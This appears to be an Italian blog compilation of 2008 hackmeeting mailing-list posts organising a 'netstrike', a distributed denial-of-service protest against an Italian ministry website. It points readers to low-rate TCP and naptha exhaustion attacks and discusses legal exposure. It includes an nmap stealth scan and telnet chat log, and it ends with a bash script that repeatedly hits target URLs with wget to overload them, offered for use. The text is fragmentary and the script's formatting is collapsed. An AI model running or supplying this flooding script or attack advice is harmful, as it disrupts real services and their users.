http://www.youtube.com/watch?v=YAd0t67vBQI
http://luigipuca.wordpress.com/2008/11/11/sabotiamo-la-gelimini-on-line-il-13-novembre-alle-1400/
http://it.wordpress.com/tag/informatica-in-movimento/
>
avellino autistici.org wrote:
>> riporto dalla lista aha:
>> http://www.autistici.org/133strike/index2.html
insomma ci lamentavamo che hackmeeting non seguisse le linee iniziali,
ma dopo la risposta di a. devo dire che si va a gonfie vele: insomma
certi fumetti sono un pericolo mi diceva una mia amica elena attrice …
grazie a domani lele
> oh, novita’, esiste una medium ed un high.
>
>>
> http://infofreeflow.noblogs.org/post/2008/11/11/netstrike-nogelmini-istruzioni-per-la-modalit-hard-high
>
> HARD HIGH, WGET -O NEL 2008 !?
> HARD HIGH !? !?
>
> Installazione di linux/macosx per usare wget ? OMFG! se si vuole aiutare
> l’utente a usare wget, il promotore dell’iniziativa si scarica cygwin,
> si compila wget.exe e lo distribuisce insieme alla cygwin1.ddl dal sito.
>
> google, ricerca con: low rate tcp attack.
> se vuoi "sacrificar la banda" e’ sufficente che con ifconfig imposti
> l’MTU dell’interfaccia di uscita ad un valore irrisorio (ma >= di 128)
>
> e poi,
> google, ricerca con: naptha exhaustion attack
>
> in entrambe le ricerche non bisogna fermarsi alla prima pagina.
>
> (sono arrivati a parlarne su PUNTO INFORMATICO!!)
> http://punto-informatico.it/2427930/PI/Commenti/sockstress-buco-che-minaccia-internet.aspx
>
> e non ditemi che il kiddame non deve usare gli attacchi perche’ poi si
> fa male, o si dice information want to be free o si dice information
> want to be lobby.
>
> qui c’e’ un elenco storico:
> http://www.isi.edu/~mirkovic/bench/attacks.html
>
>> chi mi spiega meglio quando è stato fatto il primo nestrike
>> e i pericoli legali legati al partecipare col proprio pc a un nestrike?
>
> alcuni sono "attacchi informatici" e per questo perseguibili dalla
> legge, altri sono legittimi usi della rete, che per quanto legittimi, se
> fatti da tante persone, bloccano il servizio perche’ il servizio non e’
> adeguato ad un tale carico.
>
> il denial of service in se e’ un reato in quanto impedisce l’erogazione
> di un servizio, e’ anche vero che per la legge non conta che da un IP
> sono usciti 15k pacchetti e da un altro solo 300, conta che una persona
> vuole commettere l’illecito e per questo viene perseguita.
>
> la forza di un netstrike sta nella distribuzione: tutti fanno operazioni
> legittime di accesso ad un sito, quello che sarebbe piu’ importante e’
> uniformare il tipo di comportamento, anziche’ fare LOW per tanti e VERY
> HOT HARD per pochi.
>
> quello che conta per la legge e’ la volonta’ di far disservizio (e il
> danno che deriva dal disservizio): se tutti fanno la stessa cosa e’
> comprensibile che nessuno potra’ essere perseguito, se uno fa un ping
> flood da 10 megabit dal suo ufficio, causa un’anomalia ben discriminata.
> il disservizio viene causato da tutti, ma lui viene perseguito.
>
>
>> merdusconi come potrebbe vendicarsi?
>
> cercando il tuo numero di telefono ?
>
> http://www.youtube.com/watch?v=YAd0t67vBQI
>
> siamo troppe generazioni avanti, nella mente di chi e’ "vecchio" (non
> nel senso di anziano d’eta’, nel senso di stantio in quanto certezze e
> impossibilità di cambiamento) internet non e’ quello che vedono gli
> utenti, ma una distorsione della realta’ incastonata in una cornice che
> gia’ conoscono.
>
> e ti assicuro che, come gli utenti lo vedono ora, e’ solo una
> distorsione della realta’ in una cornice di poco piu’ grande.
>
> ciao ciao
guilt spugna.org wrote:
>
> vecna:
>
>> e non ditemi che il kiddame non deve usare gli attacchi perche’ poi si
>> fa male, o si dice information want to be free o si dice information
>> want to be lobby.
>
> o btw "information wants to be cool", con gente come te o me che di
> fatto non fa una minchia se non spaccare i coglioni.
>
> Intanto quella pagina e’ li’, la tua dov’e’ ? Ah no tu sei vecna quindi
> basta dire agli altri che sono dei pirla il resto vien da se’… ROTFL
>
On Wed, 12 Nov 2008
>
> allora è un giochino che facevo al mare con freeshell da piccolo :)))
> http://web.tiscali.it/dskull/
>
> mo rifarei:
> 1)prima mi iscrivo a www.dnsstuff.com
> dopo l iscrizione mi arriva un e mail accedo con la password e entro qui
> http://private.dnsstuff.com/tools/whois.ch?ip=www.pubblicaistruzione.com
> mi
> esce:
> Registrant: Linkz Internet Services 30369 Seven Mile Beach Grand Cayman,
> Cayman Islands B.W.I. KY Domain name: PUBBLICAISTRUZIONE.COM
> Administrative
> Contact: Domain, Administrator **********@linkz.com 30369 Seven Mile Beach
> Grand Cayman, Cayman Islands B.W.I. KY +1.345.946.6879 Technical Contact:
> Domain, Administrator **********@linkz.com 30369 Seven Mile Beach Grand
> Cayman, Cayman Islands B.W.I. KY +1.345.946.6879 Registrar of Record:
> DomainNameSales Record last updated on 21-Oct-2008. Record expires on
> 26-Dec-2011. Record created on 25-Dec-2005. Domain servers in listed
> order:
> NS1.LINKZ.COM 66.199.187.176 NS2.LINKZ.COM 216.187.103.166 Domain status:
> clientDeleteProhibited clientTransferProhibited clientUpdateProhibited
>
> root@localhost:~# nmap -v -sS -O
> QUITTING! root@localhost:~# nmap -v -sS -O ++.++.++.+++ (indirizzo ip)
>
> (03:24:17) : ok adesso tu hai visto che porte ho aperte, se provi
> telnet prova, ti chiede user e pass
>
> (03:24:24) : telnet
> (03:25:12) : scrivo telnet ok
> (03:25:31) : telnet ip
> (03:26:27) : ma vedi che sistema ho??? nello scan????
> (03:27:33) : telnet ++.++.++.+++ scrivi questo
> (03:28:04) : ok
> (03:29:16) : vedi che ti chiede user e login ???
> (03:29:17) : root@localhost:~# telnet ++.++.++.+++
> (03:33:20) : questo vuol dire che io ho la porta ftp aperta e le
> altre blokkate dal firewall
> (03:40:07) : prima fai lsmod e vedi che moduli hai x la scheda
> comunque alsaconf li trova
> domandina: son stato un hacker etico?
> ciao
>
>
>
> marco@bertorello.ns0.it wrote:
>> Il 12 novembre ha scritto:
>>> non proseguo la lettura perche’ al solito sei pure lungo e noioso
>>
>> Peccato per te… è interessante
>>
>>
>>
>
root@localhost:~# nmap -v -sS -O
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-07-25 03:11
CEST
No target machines/networks specified!
QUITTING! root@localhost:~# nmap -v -sS -O ++.++.++.+++
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-07-25 03:14
CEST
Initiating SYN Stealth Scan against host+++-++.poo+++++.interbusiness.it
(++.++.++.+++) [++++ ports] at 03:14
Discovered open port 80/tcp on ++.++.++.+++
Discovered open port 23/tcp on ++.++.++.+++
Discovered open port 21/tcp on ++.++.++.+++
The SYN Stealth Scan took 15.69s to scan 1663 total ports.
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
Host host+++-++.poo++++.interbusiness.it (++.++.++.+++) appears to be up
… good.
Interesting ports on host+++-++.poo++++.interbusiness.it (++.++.++.+++):
(The 1656 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
23/tcp open telnet
80/tcp open http
136/tcp filtered profile
137/tcp filtered netbios-ns
500/tcp filtered isakmp
Device type: remote management|general purpose|media device|broadband router
Running: Compaq embedded, FreeBSD 4.X, IBM AIX 3.X|4.X, Linux 1.X, Phillips
embedded, Zyxel ZyNOS
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SInfo(V=3.75%P=i486-slackware-linux-gnu%D=7/25%Tm=42E43CF7%O=21%C=1)
TSeq(Class=64K%IPID=I%TS=2HZ)
T1(Resp=N)
T2(Resp=N)
T3(Resp=N)
T4(Resp=N)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)
Uptime 0.579 days (since Sun Jul 24 13:20:41 2005)
TCP Sequence Prediction: Class=64K rule
Difficulty=1 (Trivial joke)
IPID Sequence Generation: Incremental
Nmap run completed — 1 IP address (1 host up) scanned in 19.288 seconds
root@localhost:~#
e doveva uscire telnet
(03:24:17) : ok adesso tu hai visto che porte ho aperte, se provi
telnet prova, ti chiede user e pass
(03:24:24) : telnet
(03:25:12) : scrivo telnet ok
(03:25:31) : telnet ip
(03:26:27) : ma vedi che sistema ho??? nello scan????
(03:27:33) : telnet ++.++.++.+++ scrivi questo
(03:28:04) : ok
(03:29:16) : vedi che ti chiede user e login ???
(03:29:17) : root@localhost:~# telnet ++.++.++.+++
Trying ++.++.++.+++…
Connected to ++.++.++.+++.
Escape character is ‘^]’.
Sorry, trouble to establish connection.
Connection closed by foreign host.
root@localhost:~#
http://web.archive.org/web/20060530021050/http://www.stelladelsudteam.com/modules.php?name=Telnet
(03:32:06) : io dicevo così xchè nn ti connetti
(03:32:17) : il mio fw forse fdunziona ::))
(03:32:48) : For OSScan assuming port 21 is open, 1 is closed, and
neither are fir
alled
(03:32:52) : vedi
(03:33:20) : questo vuol dire che io ho la porta ftp aperta e le
altre blokkate dal firewall
(03:40:07) : prima fai lsmod e vedi che moduli hai x la scheda
comunque alsaconf li trova
(03:41:20) : lp 6404 0 (autoclean)
parport 22824 0 (autoclean) [lp]
uhci 24284 0 (unused)
ehci-hcd 17516 0 (unused)
usbcore 58860 1 [uhci ehci-hcd]
hw_random 2712 0 (unused)
i810_rng 2528 0 (unused)
snd-intel8x0m 8708 1
snd-ac97-codec 52472 0 [snd-intel8x0m]
snd-pcm 54504 1 [snd-pcm-oss snd-intel8x0m snd-ac97-codec]
snd-timer 13412 0 [snd-pcm]
snd 31268 0 [snd-pcm-oss snd-mixer-oss snd-intel8x0m
snd-ac97-codecsnd-pcm snd-timer]
snd-page-alloc 4712 0 [snd-mixer-oss snd-intel8x0m snd-pcm
snd-timer snd]
soundcore 3396 3 [snd]
8139too 13928 1
mii 2272 0 [8139too]
crc32 2880 0 [8139too]
ohci1394 23888 0 (unused)
ieee1394 41636 0 [ohci1394]
ds 6548 2
yenta_socket 10436 1
pcmcia_core 39172 0 [ds yenta_socket]
ide-scsi 9392 0
agpgart 45092 0 (unused)
http://www.youtube.com/watch?v=YAd0t67vBQI
su piazzanavona
http://www.archive.org/details/Burattini2008
bellissimo il finale:
> http://it.wikipedia.org/wiki/Netstrike
>
> i rischi..?..
>
> tor e privoxy dovrebbero bastare….
>
> per favore non diciamo cagate madornali!
>
> un netstrike attraverso TOR e’ un colpo durissimo all’infrastruttura di
> TOR stessa.
>
> evitare, evitare, evitare
>
>
> sgs pooed:
>
>> intanto, (parlo da niubbo quale sono) quando scrive vecna c’e’ (quasi)
>> sempre qualcosa da imparare..
>
> qualcosa da farsi dire, forse … in ogni caso se sei poco curioso mica
> e’ un problema di questa comunità.
>
>
>> uno si iscrive ad una lista che si chiama hackmeeting e si ritrova a
>> leggere di tutto tranne che di hacking (pur intendendolo nella sua
>> accezione piu’ ampia) ..
>
> pensavi fosse il circolo dei fighi al quale avere accesso a gratis e per
> questo diventare un figo a tua volta ?
> Mi sa che resti la solita macchietta del "wannabe per caso", come in
> tante ne passano qua dentro …
>
>
>> parliamo un po’ di sicurezza, bugs, *spippolamenti* vari?!
>
> ti piacerebbe, eh …
>
> in realta’ ne parliamo tutti sempre ma tu non sai leggere perche’ sei
> solo
>
>
> UAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>
> UN KID DI MERDAAAAAAAAAAAAAAAAAAAAAAAAA
>
>
> SUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUXSUX
>
>
> ciao confindustria
mia nota
http://www.ubcfumetti.com/enciclopedia/superman/
script con comando wget
#!/bin/bashfunction help() {echo -ne "n$(basename $0) [ -r RATE[k|m]] [ -d SLEEP ] [ -s START ] [ -k STOP ] URL [URL ...]"echo -ne "n- RATE, banda in bytes, kbytes o megabytes (def. 3k)."echo -ne "n- SLEEP, time di refresh (def. 1 sec)."echo -ne "n- START, data inizio netstrike (def. now)."echo -ne "n- STOP, data di fine netstrike (def. now + 5 min)."echo -ne "n- URL elenco delle pagine da aprire =] nn"exit $2}#def valueRATE="--limit-rate=3k"DELAY=1NOW=$(date '+%s')START=$NOWSTOP=$(($NOW + 300))ARG=OK[ -z "$1" ] && help 1while [ ! -z "$ARG" ]doARG="$1";VALUE="$2";case "$ARG" in-h|--help)help 1;;-r|--rate) RATE="--limit-rate=$VALUE"shift;;-d|--delay)DELAY="$VALUE"shift;;-s|--start)START=$(date -d "$VALUE" '+%s')shift;;-k|--stop)STOP=$(date -d "$VALUE" '+%s')shift;;*)URLS="$URLS $ARG";;esacshiftdoneecho "netstrike:"echo $URLS | tr " " "n"echo "From " $(date -d "01/01/1970 +1 hours $START sec" '+%d/%m/%Y %H:%M:%S')echo "To " $(date -d "01/01/1970 +1 hours $STOP sec" '+%d/%m/%Y %H:%M:%S')echo "limite di banda ${RATE##--limit-rate=}bit/sec"echo "aspetto $DELAY seconds al prox refresh"echo ""if [ $START -gt $NOW ]thenecho "attendo..."sleep $(($START - $NOW))fiecho "Netstrike avviato."while [ $NOW -lt $STOP ]dofor URL in $URLSdowget $RATE --no-http-keep-alive --cache=off --output-document=- --quiet $URL > /dev/nulldoneecho -ne "."sleep $DELAYNOW=$(date '+%s')doneecho "."
preso dall attacco high qui trovate un link che ne spiega l uso
http://bongolinux.com/wget%E2%80%A6questo-sconosciuto/06/